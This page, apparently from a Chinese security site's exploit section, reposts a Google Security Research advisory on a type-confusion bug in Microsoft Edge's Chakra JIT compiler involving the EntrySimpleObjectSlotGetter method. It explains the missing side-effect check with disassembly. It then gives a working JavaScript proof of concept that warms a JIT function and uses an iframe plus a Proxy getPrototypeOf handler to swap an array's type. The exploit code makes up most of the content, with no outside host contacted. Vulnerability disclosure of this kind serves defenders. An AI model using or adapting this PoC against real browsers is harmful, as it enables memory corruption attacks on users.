首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft Edge Chakra - EntrySimpleObjectSlotGetter Type Confusion
来源:Google Security Research 作者:Google 发布时间:2018-06-11  
/*
function opt(w, arr) {
    arr[0] = 1.1;
    let res = w.event;
    arr[0] = 2.3023e-320;
    return res;
}
 
let arr = [1.1];
for (let i = 0; i < 10000; i++) {
    opt(window, arr);
}
 
The above code will be compiled as follows:
000001a8`8000122b 48b8503dcfd5ff7f0000 mov rax,offset chakra!DOMFastPath<7>::EntrySimpleObjectSlotGetter (00007fff`d5cf3d50)  // w.event
000001a8`80001235 48ffd0          call    rax
000001a8`80001238 488b8e30bdf0ff  mov     rcx,qword ptr [rsi-0F42D0h]
000001a8`8000123f f2480f104158    movsd   xmm0,mmword ptr [rcx+58h]
000001a8`80001245 f2490f11442418  movsd   mmword ptr [r12+18h],xmm0  // arr[0] = 2.3023e-320;
...
 
As you can see, there's no "ImplicitCallFlags" check after the call to the "EntrySimpleObjectSlotGetter" method. The code was generated based on the assumption that the method has no side effects. But in fact, the method can have side effects. The method wraps the return value using the "CrossSite::MarshalVar" method which traverses up the prototype chain of the given object using the "GetPrototype" method, since the "GetPrototype" method may invoke the "getPrototypeOf" handler of a Proxy object, changing the type of the array in the handler will lead to type confusion.
 
PoC:
*/
 
function opt(w, arr) {
    arr[0] = 1.1;
    let res = w.event;
    arr[0] = 2.3023e-320;
    return res;
}
 
function main() {
    let f = document.body.appendChild(document.createElement('iframe'));
    f.contentWindow;
 
    for (let i = 0; i < 100000; i++) {
        opt(window, [1.1]);
    }
 
    let set_callback = new f.contentWindow.Function('callback', `
        window.__lookupSetter__('event').call(parent, new Proxy({}, {
            getPrototypeOf() {
                callback();
                return {};
            }
        }));`);
 
    let arr = [1.1];
    set_callback(() => {
        arr[0] = {};
    });
 
    opt(window, arr);
    alert(arr);
}
 
main();
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Sony Playstation 4 (PS4) 5.1 -
·Git < 2.17.1 - Remote Code Exe
·Procps-ng - Multiple Vulnerabi
·Zip-n-Go 4.9 - Buffer Overflow
·Siemens SIMATIC S7-300 CPU - R
·CyberArk < 10 - Memory Disclos
·GNU Barcode 0.99 - Memory Leak
·Microsoft Windows - UAC Protec
·GNU Barcode 0.99 - Buffer Over
·Linux Kernel < 4.16.11 - 'ext4
·ALFTP 5.31 - Local Buffer Over
·Clone2GO Video converter 2.8.2
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved